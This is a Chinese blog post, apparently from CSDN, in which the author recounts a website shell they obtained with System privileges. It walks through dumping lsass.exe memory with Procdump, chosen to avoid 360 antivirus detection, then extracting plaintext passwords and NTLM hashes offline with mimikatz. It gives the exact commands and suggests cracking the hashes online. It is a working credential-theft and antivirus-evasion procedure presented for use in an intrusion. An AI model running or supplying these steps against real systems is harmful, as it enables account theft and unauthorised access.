利用Procdump+Mimikatz获取Windows帐户密码

在这里插入图片描述
0x01 前言:
前段时间拿下一个网站的shell,很幸运的是直接就是System权限,结果发现执行添加用户命令并不能成功回显

看了下系统进程,原来是开启了360的主动防御,奈何也不会做免杀,上传exp运行就被杀,尝试各种方法去kill主动防御进程,无果。。。

在土司发帖求助了一下经验丰富的大佬们,然后就有了如下文章:

实验环境:win7企业版64位

0x02 导出lsass.exe
首先要获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到

在这里插入图片描述

这里用到微软官方发布的工具Procdump导出lsass.exe,所以不存在被杀软拦截的情况:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

在这里插入图片描述

0x03 执行mimikatz
这里不建议直接上传到服务器上执行,一是有一定概率出现玄学bug导致服务器崩溃,二是可能会被杀软拦截

在这里插入图片描述

将lsass.dmp下载到本地后,然后执行mimikatz

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

0x04 列出账号密码
可以看到有明文的密码,还有NTLM的hash

在这里插入图片描述

hash可以拿去网站解密下,一般情况下六位以下密码还是很容易破解出来的

在这里插入图片描述

©️2020 CSDN 皮肤主题: 大白 设计师: CSDN官方博客 返回首页
实付0元
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值